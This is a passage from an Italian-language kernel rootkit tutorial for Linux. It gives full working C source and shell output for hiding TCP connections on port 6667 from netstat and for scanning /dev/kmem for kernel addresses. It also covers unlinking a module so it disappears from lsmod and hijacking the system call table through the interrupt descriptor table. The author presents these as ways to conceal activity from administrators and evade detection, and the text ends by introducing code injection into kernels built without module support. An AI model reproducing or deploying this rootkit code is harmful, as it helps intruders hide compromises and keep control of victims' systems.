#endif
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/dirent.h>
#include <linux/unistd.h>
#include <linux/mm.h>
#include <asm/uaccess.h>
#include <sys/syscall.h>
#include <linux/proc_fs.h>
MODULE_LICENSE("GPL");
#define HPORT 6667 /* Nasconderemo tutte le connessioni con porta uguale
                      alla 6667 */
#define NET_LINE_MAX_LENGTH 150

int (*o_get_info)(char *page, char **start, off_t pos, int count);

struct proc_dir_entry *get_tcp(void)
{
/* Cerchiamo l'entry "tcp" */

	struct proc_dir_entry *ptr=proc_net->subdir;
	while(strcmp(ptr->name,"tcp"))
		ptr=ptr->next;
	return ptr;
}

char *strnstr(const char *dove, const char *cosa, size_t lungo)
{
/* Controlliamo la presenza di una stringa in un'altra entro
   "lungo" bytes. L'output della tcp_get_info sara` tutto "in fila"
    percio` usiamo questa funzione per controllare TMPSZ bytes e cosi`
    andare di riga in riga
 */
    
        char *str = strstr(dove, cosa);
        if (!str)
                return NULL;
        if (str-dove+strlen(cosa) <= lungo)
                return str;
        else
                return NULL;
}

/* Calcoliamo la lunghezza del "nostro" output */

int get_newsize(void)
{
	char page[NET_LINE_MAX_LENGTH*10+1],*start,*ptr,
	     porta[12];

	int length=0,result,found=0;

	sprintf(porta,":%04X",HPORT);
	printk("%s\n",porta);
	while(1) 
	{
		memset(page,0,sizeof(page));
		/* Chiamiamo la funzione originaria e quando ha finito usciamo
		   dal ciclo */
		if ((result=o_get_info(page,&start,length,sizeof(page)-1))<=0)
			break;

		/* Sommiamo il risultato parziale agli altri in modo da
		   avere alla fine il numero totale dei bytes letti
		 */
		length+=result;
		for(ptr=start;ptr<start+result;ptr+=NET_LINE_MAX_LENGTH)
		{
			/* Controlliamo di riga in riga se troviamo la stringa
			   da nascondere, in caso affermativo si aumenta la
			   variabile che ci dice quante stringhe dobbiamo
			   eliminare
			 */
			if(strnstr(ptr,porta,NET_LINE_MAX_LENGTH)) {
				found++;
			}
		}
	}
	/* ritorniamo i bytes totali meno quelli occupati da stringhe da
	   eliminare */
	return length-found*NET_LINE_MAX_LENGTH;
 }


int n_get_info (char *page, char **start, off_t pos, int count)
{
	int result,connections;
	char *temp,*to_ptr,*from_ptr,porta[12];	
	/* Se abbiamo gia` scritto tutto il possibile ritorniamo 0 */
	if (pos >= get_newsize())
		return 0;

	if ((result=o_get_info(page,start,pos,count))<=0)
		return result;

	
	temp=(char*)kmalloc(result+NET_LINE_MAX_LENGTH+1,GFP_KERNEL);
	memset(temp,0,result+NET_LINE_MAX_LENGTH+1);

	to_ptr=temp;

	if(pos>=NET_LINE_MAX_LENGTH)
	{
		from_ptr=page;
		/* Se non e` la prima volta che la funzione viene chiamata
		   dobbiamo calcolare il numero delle connessioni gia` scritte.
		   Siccome si va di TMPSZ in TMPSZ dividendo i bytes scritti
		   per TMPSZ e decrementando di 1 (la loro numerazione va da 0
		   ad n-1) otteniamo il prossimo identificatore numerico da
		   utilizzare
		 */
		connections=(pos/NET_LINE_MAX_LENGTH)-1;
	}
	else
	{
		/* Se e` la prima volta che veniamo chiamati
		 * dobbiamo copiare la stringa di intestazione
		 * nel nostro buffer temporaneo, incrementare
		 * i puntatori per le copie ed inizializzare
		 * l'identificatore delle connessioni
		 */

		memcpy(to_ptr,page,NET_LINE_MAX_LENGTH);
		to_ptr+=NET_LINE_MAX_LENGTH;
		from_ptr=page+NET_LINE_MAX_LENGTH;
		connections=0;
	}

	for(;from_ptr<page+result;from_ptr+=NET_LINE_MAX_LENGTH)
	{
		sprintf(porta,":%04X",HPORT);
		/* Se nella stringa corrente non c'e` la sottostringa da
		   eliminare patchiamo l'identificatore, copiamo la stringa
		   nel buffer temporaneo, incrementiamo il puntatore che ci
		   dice dove scrivere ed il numero di connessione
		 */
		 
		if(!(strnstr(from_ptr,porta,NET_LINE_MAX_LENGTH)))
		{
		/* Patchiamo */
			sprintf(porta,"%4d:",connections);
			strncpy(from_ptr,porta,strlen(porta));
		/* Copiamo */
		
			memcpy(to_ptr,from_ptr,NET_LINE_MAX_LENGTH);
			
		/* Incrementiamo */
			to_ptr+=NET_LINE_MAX_LENGTH;
			connections++;
		}
	}
      
      /* Sovrascriviamo */
      
	memcpy(page,temp,result);

      /* Fix delle dimensioni (se necessario) */
      
	connections=strlen(temp);
	
	if(result<0)
		result=0;
	else if(result>connections)
		result=connections;
	
	*start = page;
	kfree(temp);
	
	return result;
}

int init_module(void) {
	struct proc_dir_entry *tcp=get_tcp();
	o_get_info=tcp->get_info;
	tcp->get_info=n_get_info;
	return 0;
}

void cleanup_module(void) 
{
	struct proc_dir_entry *tcp=get_tcp();
	tcp->get_info=o_get_info;
}
<-X->

Vortex:~# netstat -an | grep 6667
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN
Vortex:~# insmod nethide.o
Vortex:~# netstat -an | grep 6667
Vortex:~# rmmod nethide
Vortex:~# netstat -an | grep 6667
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN
Vortex:~#

Perfetto, ed ora che abbiamo visto questa tecnica, volendo, potremmo riscrivere
l'occultamento di processi usando proc e senza bisogno di andare a monitorare
tutte quelle syscall che interagiscono con una directory dato che basterebbe
lavorare con le inode_operations di proc... :) Ve lo lascio come esercizio.


- CONSIDERAZIONI

Senza ombra di dubbio e` una tecnica estremamente comoda la modifica delle
funzioni del procfs, senza contare che ci sono molte altre funzioni che
possiamo andare a sostituire, non esistono solo la read_proc e la get_info,
questi sono stati esempi per farvi capire quanto facile possa essere. C'e un
problema pero':
Vortex:~# grep tcp_get_info /boot/System.map
c0265e10 T tcp_get_info
Vortex:~#
Le modifiche ai puntatori possono essere individuate attraverso un controllo
coi valori presenti in System.map. Cosi` facendo abbiamo solamente spostato il
problema, ma non risolto, in quanto adesso tutti sanno che e` buona cosa
controllare anche quelle funzioni. Una possibile soluzione potrebbe essere
integrare la tecnica del salto in questa del procfs, ovvero modificare i primi
bytes della tcp_get_info (ad esempio) e farla saltare nella nostra
n_tcp_get_info, oppure potremmo adottare delle tecniche un po` piu` avanzate,
cosa che vedremo tra breve. Comunque sia, ce ne sono di soluzioni, avete solo
l'imbarazzo della scelta :-)


SEZIONE V
=========

- MEMORY PARSER
  
Nella parte sulla redirezione di una qualsiasi funzione ho parlato della
realizzazione di strumenti appositi che possano fornirci quegli indirizzi di
funzioni non esportate che ci servono per i nostri hook. Quegli strumenti sono
i parser di memoria.
Un parser di memoria, come dice il nome, non e` altro che un programma che
attraverso algoritmi di analisi della memoria piu` o meno sofisticati e` in
grado di fornirci un indirizzo od un qualsiasi valore che ci serva. Ora ne
implementeremo uno in modo da darvi un'idea di come dovete procedere per la
loro realizzazione. Tuttavia, con l'utilizzo di questi programmi, si rende
molto meno pulito il nostro lavoro, infatti un parser puo' restituire un
indirizzo errato (con conseguente crash della macchina al 99% dei casi) oppure
non trovare proprio niente. E` fondamentale percio` testarli con molti
kernel/configurazioni differenti per non avere brutte sorprese.
    
- KMEM

Il file /dev/kmem e` un file speciale (una character device per essere precisi)
che e` un'immagine della memoria virtuale del kernel. In parole povere,
accedendo a questo file si puo' leggere/scrivere direttamente nella memoria
del kernel.
Sfrutteremo questo file per andare a leggere la memoria del kernel su cui
faremo parsing.
  
- L'IMPLEMENTAZIONE

Creiamo un parser che vada a trovare in memoria l'indirizzo della module_list
ad esempio.

1)
   
 Dobbiamo avere un'idea molto precisa della struttura del kernel in memoria
 per effettuare questo tipo di ricerche, quindi dobbiamo trovare un sistema
 per scoprire com'e` fatto.
 Fortunatamente se ci spostiamo nella directory dei sorgenti del kernel dopo
 la compilazione noteremo la presenza di un file, vmlinux. Questo e`
 un'immagine non compressa del kernel che abbiamo compilato (e che state
 facendo girare spero:), quindi basta crearne un dump human-readable con
 objdump per ottenere letteralmente una mappa della memoria.

 Vortex:/usr/src/linux# objdump -D vmlinux > vmlinuxdump
 Vortex:/usr/src/linux# ls vmlinuxdump
  -rw-r--r--    1 root     root     43440490 Mar  6 02:03 vmlinuxdump
 Vortex:/usr/src/linux# cat vmlinuxdump
     
  vmlinux:     file format elf32-i386
      
      Disassembly of section .text:
       
       c0100000 <startup_32>:
       c0100000:       fc                      cld
       c0100001:       b8 18 00 00 00          mov    $0x18,%eax
       c0100006:       8e d8                   mov    %eax,%ds
       c0100008:       8e c0                   mov    %eax,%es
       ...

 e cosi` via.

2)

 Facciamo un grep per ottenere l'indirizzo della module_list :

 Vortex:/usr/src/linux# grep \<module_list\> vmlinuxdump
  c030b100 <module_list>:

 poi apriamo il dump, con less ad esempio, e facciamo una ricerca di questo
 indirizzo per vedere dove compare. Se siamo fortunati una funzione esportata
 od una a cui e` facile risalire usera` module_list, se non lo siamo ci
 tocchera` prendere nota delle funzioni che lo utilizzano e poi iniziare a
 trovare il modo di rintracciare quelle funzioni e cosi` ricorsivamente. Piu`
 livelli di ricorsivita` ci sono, ovviamente, piu` e` facile commettere
 errori, percio` cercate di ridurli al minimo. Per aiutarvi, ad esempio,
 potreste anche utilizzare un modulo: mettiamo il caso che stiate cercando un
 simbolo non esportato, ma a cui un modulo puo' accedere facilmente, come la
 tcp_get_info, create un modulo ad hoc che vi restituisca l'indirizzo e poi
 potete continuare il vostro lavoro con una percentuale di errore diminuita di
 molto.
 Ritornando alla module_list, siamo stati abbastanza fortunati: la utilizza
 una syscall, la sys_create_module:
 
 ...
 ...
 c011ff30:   a1 00 b1 30 c0          mov    0xc030b100,%eax  <----
 c011ff35:   89 43 04                mov    %eax,0x4(%ebx)
 c011ff38:   81 3d 18 b1 30 c0 ad    cmpl   $0xdead4ead,0xc030b118
 c011ff3f:   4e ad de
 c011ff42:   89 1d 00 b1 30 c0       mov    %ebx,0xc030b100  <----
 c011ff48:   74 08                   je     c011ff52 <sys_create_module+0x192>
 ...
 ...  
 
 Come potete vedere, l'indirizzo che ci interessa e` utilizzato come argomento
 di una mov dopo il cmpl con quel numero cosi` appariscente, 0xdead4ead.
 Possiamo percio` pensare che sia una sorta di controllo con un valore fisso.

 Vortex:/usr/src/linux# rgrep 0xdead4ead ./*
  ./include/asm/spinlock.h:#define SPINLOCK_MAGIC 0xdead4ead
    
 Infatti. Possiamo percio` procedere in questo modo: otteniamo l'indirizzo
 della sys_create_module dalla sys_call_table, da li` ci spostiamo ad
 analizzare la sys_create_module cercando un'istruzione cmp con quel valore
 come argomento seguita da una mov. Uno degli argomenti della mov e`
 l'indirizzo che ci serve.

3)
   
 Non dobbiamo dimenticare pero` che quello che noi andremo a leggere non
 saranno comode istruzioni in assembly, ma sara` codice macchina. Non
 disperate, qualcuno ci ha gia` pensato, sono infatti disponibili sul
 sito http://bastard.sourceforge.net le libdisasm, delle librerie che
 permettono di convertire codice macchina => istruzioni assembly in modo
 estremamente semplice.

<-| LKEPD/parser.c |->
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <bastard.h>
#include <libdis.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <errno.h>

#define KMEM "/dev/kmem"
#define SIZE 20
#define SYS_CALL_TABLE 0xindirizzo_della_sys_call_table

int             stalk_module_list(int fd);

int
main(void)
{
    int             file_descriptor;
    if ((file_descriptor = open(KMEM, O_RDONLY)) < 0) {
	fprintf(stderr, "Cannot open kmem\n");
	exit(-1);
    }
    if (lseek(file_descriptor, SYS_CALL_TABLE, SEEK_SET) == -1) {
	fprintf(stderr, "Cannot set right offset\n");
	close(file_descriptor);
	exit(-1);
    }
    disassemble_init(0, ATT_SYNTAX);

    if ((stalk_module_list(file_descriptor)) < 0)
	exit(-1);

    disassemble_cleanup();
    close(file_descriptor);
    return 0;
}

int
stalk_module_list(int fd)
{
#define MAGIC   "dead4ead"

    unsigned char   buffer[SIZE];
    unsigned char   tmpbuffer[SIZE];
    unsigned long   address;
    unsigned long   s_c_t[256];
    struct instr    istruzione;
    int             i,
                    j;

    /*
     * Leggiamo e memorizziamo tutta la sys call table 
     */
    if (read(fd, s_c_t, 256 * 4) <= 0)
	return -1;
    /*
     * Memorizziamo l'indirizzo della syscall che dobbiamo analizzare 
     */
    address = s_c_t[SYS_create_module];

    for (i = 0;; i += j) {
	if (lseek(fd, address + i, SEEK_SET) == -1)
	    return -1;
	if (read(fd, buffer, SIZE) < SIZE) {
	    fprintf(stderr, "Cannot read\n");
	    return -1;
	}

	if ((j = disassemble_address(buffer, &istruzione))) {
	    if (istruzione.mnemonic[0] != 0)
	    /* Controllo che istruzione e` */
		if ((strstr(istruzione.mnemonic, "cmp")))
		    if (istruzione.src[0] != 0) {
		    /* Le libdisasm trasformano in signed i valori che
		       trovano, percio` saranno sotto forma di -0xabcdef ad
		       esempio. Il nostro invece e` un numero unsigned,
		       percio` trasformiamo il valore che trovano le
		       libdisasm in unsigned, poi confrontiamo le 2 stringhe
		     */
			sprintf(tmpbuffer, "%x",
				strtoul((char *) &istruzione.src[1], NULL,
					16));
			if (strstr(tmpbuffer, MAGIC)) {
			    /*
			     * Ok ora dobbiamo controllare l'istruzione
			     * successiva 
			     */
			    if (lseek(fd, address + i + j, SEEK_SET) == -1)
				return -1;
			    if (read(fd, buffer, SIZE) < SIZE) {
				fprintf(stderr, "Cannot read\n");
				return -1;
			    }
			    if (disassemble_address(buffer, &istruzione) >
				0) {
				if (istruzione.mnemonic[0] != 0)
				    if ((strstr
					 (istruzione.mnemonic, "mov")))
					if (istruzione.dest[0] != 0) {
					    printf("0x%x\n",
						   strtoul((char *)
							   &istruzione.
							   dest, NULL,
							   16));
					    break;
					}
			    }
			}
		    }

	}

	else
	/* In caso non riesca a disassemblare aumenta di 1, altrimenti si
	   creerebbe un loop */
	    j = 1;
    }
    return 0;
}
<-X->

 Vortex:~# gcc -ldisasm parser.c -o parser
 Vortex:~# ./parser
 0xc030b100
 Vortex:~# grep c030b100 /boot/System.map
 c030b100 D module_list
 Vortex:~#


- COME NASCONDERE UN MODULO

Come potete immaginare, non vi ho fatto cercare la module_list per nulla :)
Ora vedremo come sfruttarla per nascondere il nostro modulo.
Tutti i moduli durante la creazione vengono agganciati in testa ad una lista,
e la testa di questa lista e` proprio module_list. L'idea e` semplice:
scorriamo questa lista fino a trovare il nostro modulo, quando lo troviamo
replichiamo (in parte) il funzionamento della sys_delete_module, ma NON
liberiamo la memoria occupata dal modulo: cosi` facendo le zone di memoria
rimarrano occupate dal nostro codice, ma il modulo sara` cancellato dal
sistema, percio` tutti i nostri hack continueranno ad essere funzionanti :)

<-| LKEPD/cloack.c |->
#define MODULE
#define LINUX

#ifdef CONFIG_MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/sched.h>

#define MODULE_LIST /* Qui inserite il valore che vi ha restituito il parser */

struct module **my_module_list=(struct module **)MODULE_LIST;
struct module *my_find_module(char *);
char *name;
MODULE_PARM(name,"s");
int hide(char *name)
{
	struct module *module = NULL;
	
		
	module = my_find_module(name);
	if (module != NULL) {
		module->flags |= MOD_DELETED;
		if (module->flags & MOD_RUNNING)
			module->flags &= ~MOD_RUNNING;
		if (module == *my_module_list)
			*my_module_list = module->next;
		else {
			struct module *runner;
			/* Attraverso i puntatori ->next si scorre la lista di
			   moduli */
			for (runner = *my_module_list; runner->next != module; \
			                           runner = runner->next)
				continue;
			runner->next = module->next;
		}
	} 
	
	return 0;
}

struct module *
my_find_module(char *name)
{
      struct module *mod;
      for (mod = *my_module_list; mod ; mod = mod->next) {
              if (mod->flags & MOD_DELETED)
                    continue;
	/* Il campo name contiene il nome del modulo */
              if (strstr(mod->name, name))
                    break;
      }
      return mod;
}

int init_module(void) {
	hide(name);
	return 0;
}
<-X->

Vortex:~# lsmod | grep test
test                        372    0  (unused)
Vortex:~# insmod cloack.o name=test
Vortex:~# lsmod | grep test
Vortex:~#


- UNO SGUARDO AI 2.6

Il parser mostrato prima e` perfettamente funzionante, ma necessita
dell'indirizzo della sys call table per poter funzionare, indirizzo che nei
kernel della versione 2.6.x non e` piu esportato. Dobbiamo trovare percio` un
sistema affidabile per trovare questo indirizzo.


- INTERRUPT DESCRIPTOR TABLE

Un interrupt puo' essere definito come un evento che altera la sequenza di
istruzioni eseguita dal processore.
Ad esempio, quando chiamiamo una syscall succede questo: vengono sistemati i
valori opportuni nei registri in base a che syscall stiamo utilizzando e poi
viene chiamato l'interrupt numero 0x80. Praticamente diciamo al kernel: il
tipo di interrupt che ti mandiamo e` questo (0x80) e nei registri trovi i
parametri, fai quel che devi.
L'interrupt descriptor table e` una tabella che associa ciascun interrupt coni
la routine che deve essere eseguita per gestirlo.
Guardate questo piccolo programma di esempio:

int main(void) {
     char *ciao="ciao\n";
     asm volatile ("mov $0x4,%%eax\n" <- Mettiamo il numero 4 nel registro eax.
                                         Il 4 corrisponde al numero della
                                         sys_write.
                   "mov $0x1,%%ebx\n" <- Mettiamo il numero 1 in ebx.
                                         Questo parametro rappresenta il file
					 descriptor dove andra` a scrivere la
                                         write. 1 significa standard output.
                   "mov $0x5,%%edx\n" <- Il 5 sono i bytes che la funzione
                                         dovra` scrivere.
                   "mov %0,%%ecx\n"   <- Mettiamo l'indirizzo contenuto nella
                                         variabile ciao in ecx. %0 significa
                                         il primo argomento di input, ovvero
                                         quello poco piu` sotto :"m" (ciao).
                                         Gli stiamo dicendo di caricare dalla
                                         memoria [ "m" ] il contenuto della
                                         variabile ciao [ (ciao) ] e metterlo
                                         in ecx.
                   "int $0x80"        <- Chiamiamo l'interrupt.
                   :
                   :"m" (ciao)
                   );
}

Vortex:~# ./tmp
ciao
Vortex:~#

Questo significa che nella routine assegnata all'interrupt 0x80 c'e` un
sistema per risalire alle funzioni della sys call table od alla sys call
table, vediamo percio` prima di trovare questa routine, poi di analizzarla.


- INT 0x80

L'interrupt descriptor table e` una tabella di 256 entry grandi 8 bytes
l'una la cui struttura e` a grandi linee la seguente:

 63                      48|47           40|39              32  
 +------------------------------------------------------------
 |                         |                                 |
 | HANDLER ADDR   (16-31)  |	     NOT INTERESTING	     |
 |                         |                                 |
 =============================================================
 |                         |				     |
 |    NOT INTERESTING      | 	     HANDLER ADDR   (0-15)   |
 |                         |				     |
 ------------------------------------------------------------+
 31                      16|15                               0

Come possiamo vedere l'indirizzo dell'handler e` diviso in due all'interno
degli 8 bytes dell'entry, dovremo percio` ricompattarlo prima di poterlo
usare.
A questo punto dobbiamo solamente accedere alla posizione 0x80 dell'IDT per
trovare l'indirizzo della routine da analizzare per risalire all'indirizzo
della sys call table.
Ma come facciamo a risalire all'indirizzo dell'IDT? Esiste un'istruzione
assembly che ci restituisce questo indirizzo, la " sidt " :)
Vediamo percio` come risalire prima all'IDT e poi all'indirizzo della routine
che ci interessa:

<-| LKEPD/int80sidt.c |->
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

#define KMEM "/dev/kmem"
 
struct {
    unsigned short not_interesting;
    unsigned int start;
} __attribute__ ((packed)) idt;

struct {
    unsigned short addr1;
    unsigned char  not_interesting[4];
    unsigned short addr2;
} __attribute__ ((packed)) idt_entry;

/* Legge da un file descriptor tot bytes ad una posizione specificata */
int kread(int des, unsigned long addr, void *buf, int len)
{
    int rlen;
    if(lseek(des, (off_t)addr, SEEK_SET) == -1)
                  return -1;
    if((rlen = read(des, buf, len)) != len)
                  return -1;
    return rlen;
}
		 
int main(void)
{
 int kmem;
 unsigned long int80_routine;

 /* Mettiamo l'output dell'istruzione nella variabile idt */
 asm ("sidt %0" : "=m" (idt));
 
 if ((kmem=open(KMEM, O_RDONLY))<0)
 	return -1;
	
 /* Ci spostiamo di 0x80 posizioni grandi ciascuna 8 bytes dal punto di
    partenza della IDT, poi leggiamo l'entry corrispondente, ovvero quella
    dell'int 0x80
 */
 if (kread(kmem, idt.start+8*0x80, &idt_entry, sizeof(idt_entry))<0)
 		return -1;
 /* Ricompattiamo l'indirizzo */
 int80_routine= (idt_entry.addr2 << 16) | idt_entry.addr1;
 
 printf("Int80 handler=%x\n",int80_routine);
 close(kmem);
 return 0;
}
<-X->
	
Vortex:~# ./int80sidt
Int80 handler=c0107b0c
Vortex:~# grep c0107b0c /boot/System.map
c0107b0c T system_call
Vortex:~#

Bingo :>


- SYS CALL TABLE

Andiamo subito a vedere nel dump di vmlinux com'e` fatta la funzione appena
trovata:

  c0107b0c <system_call>:
  c0107b0c:       50                      push   %eax
  c0107b0d:       fc                      cld
  c0107b0e:       06                      push   %es
  c0107b0f:       1e                      push   %ds
  c0107b10:       50                      push   %eax
  c0107b11:       55                      push   %ebp
  c0107b12:       57                      push   %edi
  c0107b13:       56                      push   %esi
  c0107b14:       52                      push   %edx
  c0107b15:       51                      push   %ecx
  c0107b16:       53                      push   %ebx
  c0107b17:       ba 18 00 00 00          mov    $0x18,%edx
  c0107b1c:       8e da                   mov    %edx,%ds
  c0107b1e:       8e c2                   mov    %edx,%es
  c0107b20:       bb 00 e0 ff ff          mov    $0xffffe000,%ebx
  c0107b25:       21 e3                   and    %esp,%ebx
  c0107b27:       f6 43 18 02             testb  $0x2,0x18(%ebx)
  c0107b2b:       75 5f                   jne    c0107b8c <tracesys>
  c0107b2d:       3d 0e 01 00 00          cmp    $0x10e,%eax
  c0107b32:       0f 83 81 00 00 00       jae    c0107bb9 <badsys>
  c0107b38:       ff 14 85 f8 8f 30 c0    call   *0xc0308ff8(,%eax,4)
  c0107b3f:       89 44 24 18             mov    %eax,0x18(%esp,1)
  c0107b43:       90                      nop
   
Guardate la call, quella sul fondo, l'indirizzo non vi sembra familiare?

 Vortex:~# grep c0308ff8 /proc/ksyms
 c0308ff8 sys_call_table_Rsmp_dfdb18bd
 Vortex:~#

Esattamente quello che stavamo cercando. Ora basta un banale parsing della
funzione per risalire all'indirizzo che ci interessa :-) Volendo non serve
nemmeno scomodare le libdisasm, l'opcode di quel tipo di call e` fisso,
percio` basterebbe leggere la funzione e cercare al suo interno "\xff\x14\x85":

 unsigned long sys_call_table;
 ....

 void *ptr=memmem(buffer_contenente_la_funzione,"\xff\x14\x85",100);
 sys_call_table= *(unsigned long*)ptr+3; /* I 3 bytes del pattern ;) */

Ecco fatto :-)


- CONSIDERAZIONI

In questa sezione, anche se fino ad ora non gli si e` dato molto peso, abbiamo
introdotto una cosa importantissima, kmem. Fino ad adesso l'abbiamo utilizzato
solo come un file dove andare a leggere le informazioni che ci servivano, ma
non dobbiamo dimenticare che su questo file possiamo andare anche a 
scrivere... ~:)

Abbiamo anche visto come fa` il sistema a risalire alla sys call table, ma ora
vi chiedo: e` proprio necessario andare a modificare la sys call table per
redirigere le sue funzioni? ~:)


SEZIONE VI 
==========

- HIJACKING DELLA SYS CALL TABLE

La risposta ovviamente e` no :) Pensateci un attimo, se il sistema risale alla
sys call table semplicemente tramite l'indirizzo che andiamo a scoprire col
giochetto sidt/parsing sarebbe uno scherzetto andare a modificare quel
valore...
Controlliamo:

 Vortex:~# grep sys_call_table /proc/ksyms
 c0308ff8 sys_call_table_Rsmp_dfdb18bd
 Vortex:~# grep c0308ff8 /usr/src/linux/vmlinuxdump
 c0107b38:       ff 14 85 f8 8f 30 c0    call   *0xc0308ff8(,%eax,4)
 c0107ba4:       ff 14 85 f8 8f 30 c0    call   *0xc0308ff8(,%eax,4)
 c0308ff8 <sys_call_table>:
 c0308ff8:       60                      pusha
 Vortex:~#
 
Chiaramente gli ultimi due match sono irrilevanti, ma andando a controllare i
primi due vediamo che il primo corrisponde al valore che troviamo con la
tecnica esposta poco fa, mentre il secondo appartiene a questa funzione:

 c0107b8c <tracesys>:
 c0107b8c:       c7 44 24 18 da ff ff    movl   $0xffffffda,0x18(%esp,1)
 c0107b93:       ff
 c0107b94:       e8 37 4b 00 00          call   c010c6d0 <syscall_trace>
 c0107b99:       8b 44 24 24             mov    0x24(%esp,1),%eax
 c0107b9d:       3d 0e 01 00 00          cmp    $0x10e,%eax
 c0107ba2:       73 0b                   jae    c0107baf <tracesys_exit>
 c0107ba4:       ff 14 85 f8 8f 30 c0    call   *0xc0308ff8(,%eax,4) <- Eccolo
 c0107bab:       89 44 24 18             mov    %eax,0x18(%esp,1)
 
ed il kernel ci accede nel medesimo modo. Tutto qui, non ci sono altre
occorrenze, forse e` davvero semplice com'era sembrato all'inizio... :) Notate
anche gli indirizzi, sono funzioni molto vicine, percio` con un piccolo
parsing su una zona di memoria limitata dovremmo essere in grado di
localizzarle tutte.
Procediamo in questo modo allora:

- Creiamo una sys call table "finta".
- Copiamo la sys call table vera in quella finta.
- Modifichiamo un puntatore a funzione della sys call table finta per prova.
- Sovrascriviamo l'indirizzo in memoria della sys call table originale con
  quello della nostra finta.

<-| LKEPD/int80.c |->
#define __KERNEL__
#define MODULE
#ifdef CONFIG_MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/mm.h>
#include <sys/syscall.h>

struct {
     unsigned short not_interesting;
     unsigned int start;
} __attribute__ ((packed)) idt;

struct {
     unsigned short addr1;
     unsigned char  not_interesting[4];
     unsigned short addr2;
} __attribute__ ((packed)) idt_entry;

/* Questa funzione fa` l'equivalente di memmem(buffer,"\xff\x14\x85",3) */
char  *parse(char *start,int size)
{
   char           *p;
   for (p = start; p < start + size; p++)
   if (*p  == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')
	    return p;
   return NULL;
}

static unsigned long sct;
static unsigned long *n_s_c_t; /* Puntatore alla nostra nuova sys call table */

int (*o_setuid32)(unsigned int id);

int n_setuid32(unsigned int id)
{
/* Nulla di complesso, solo un semplice saluto :-) */

	printk("Hello world\n");
	return o_setuid32(id);
}

/* Cerca per 200 bytes l'indirizzo della sys call table e lo sostituisce con
   quello della nostra tabella
 */
int seek_and_change(unsigned long addr)
{
	unsigned char *ptr;
	unsigned long counter=addr,times=0;
	 
	for(ptr=(unsigned char*)addr;ptr<ptr+200;ptr++)
		if(*(unsigned long*)ptr==sct)
		{
		    /* Ricordate? Deve trovare 2 occorrenze */
			if(++times==2)
				 return 0;
			*(unsigned long*)ptr=(unsigned long)n_s_c_t;
		}
	if(times==0)
		return -1;

	return 0;
}

/* Cerca per 200 bytes l'indirizzo della nostra tabella e lo sostituisce
   con quello originale. Verra` usata nel cleanup.
 */
int seek_and_restore(unsigned long addr)
{
	unsigned char *ptr;
	unsigned long counter=addr,times=0;
	for(ptr=(unsigned char*)addr;ptr<ptr+200;ptr++)
		if(*(unsigned long*)ptr==(unsigned long)n_s_c_t)
		{
			if(++times==2)
				return 0;
			*(unsigned long*)ptr=sct;
		}
	if(times==0)
		return -1;
	return 0;
}

	 
static char		*ptr;
static char            buffer[100]={ 0 };
static unsigned long   int80_routine;

int init_module(void)
{

	asm ("sidt %0" : "=m" (idt));
	memcpy(&idt_entry,(unsigned long*)(idt.start+8*0x80),sizeof(idt_entry));
	int80_routine= (idt_entry.addr2 << 16) | idt_entry.addr1;
	memcpy(buffer,(unsigned long*)int80_routine,sizeof(buffer));
	ptr=(char*)parse(buffer,sizeof(buffer));
	if (!ptr)
		return -1;
	sct=*(unsigned long*)(ptr+3);
	/* Ok, ora che abbiamo trovato la sys call table allochiamo memoria
	   per quella nuova
	 */
	n_s_c_t=(unsigned long*)kmalloc(256*sizeof(void*),GFP_KERNEL);

	/* Copiamo la sct originale nella nostra */
	memcpy(n_s_c_t,(unsigned long*)sct,256*sizeof(void*));
	
	/* Salviamo il puntatore originario */
	o_setuid32=(void*)((unsigned long*)sct)[SYS_setuid32];
	
	/* Modifichiamo il puntatore con la nostra funzione */
	n_s_c_t[SYS_setuid32]=(unsigned long)n_setuid32;
	
	/* Modifichiamo i valori in memoria */
	if(seek_and_change(int80_routine)<0) {
		kfree(n_s_c_t);
		return -1;
	}

	return 0;
}

void cleanup_module(void)
{
	seek_and_restore(int80_routine);
	kfree(n_s_c_t);
}
<-X->

Compiliamo e testiamo:

 Vortex:/tmp# insmod int80.o
 Vortex:/tmp# su angel
 angel@Vortex:/tmp$ dmesg
 Hello world
 angel@Vortex:/tmp$
 
Funziona :>


- IL PROBLEMA

Tutte le tecniche piu` o meno complesse che abbiamo visto fin'ora ci
consentono di nascondere egregiamente praticamente ogni tipo di informazione
a noi scomoda, ma hanno tutte il medesimo enorme problema: sono tutte
utilizzabili solamente se la macchina su cui ci troviamo ha il supporto per i
moduli. Inoltre, di recente, si e` diffusa la curiosa convinzione che basti
disabilitare il supporto per i moduli per mettersi al riparo dagli attacchi a
kernel space. La cosa sarebbe fastidiosa davvero, se non fosse per il fatto
che e` una convinzione completamente sbagliata.
Ora andremo a vedere come "installare" dei moduli in una macchina senza
supporto per i moduli :)


- FORMA E STRUTTURA

Come penso abbiate gia` immaginato, e` proprio questo il momento in cui
rientra in scena /dev/kmem, cosi` come l'abbiamo usato in lettura possiamo
utilizzarlo in scrittura. Quando andiamo ad inserire un modulo nel kernel con
insmod non facciamo altro che aggiungere/modificare dati a kernel space, cosa
che possiamo fare benissimo a userspace lavorando su kmem dato che le zone di
memoria raggiungibili sono le stesse.

Innanzitutto, dobbiamo ricordarci che con kmem andiamo accedere direttamente
alla memoria e quello che conterra` sara` codice macchina, pertanto non
potremo semplicemente "copiare" il file del nostro modulo su kmem per farlo
funzionare, sara` necessario un po` di lavoro in piu`. (Pensavate davvero che
fosse cosi` facile? ;)
 
Nel modo in cui andremo a lavorare, ovvero copiando direttamente del codice
pronto da eseguire in memoria, non avremo il supporto del linker, percio`
dovremo lavorare senza poter utilizzare i simboli del kernel, variabili
globali e stringhe, in quanto e` proprio quest'ultimo che si occupa della
loro rilocazione.
Normalmente e` insmod che si occupa di queste cose, infatti se avete notato,
abbiamo sempre compilato i nostri moduli con l'opzione -c :

"...For example, the -c option says not to run the linker."
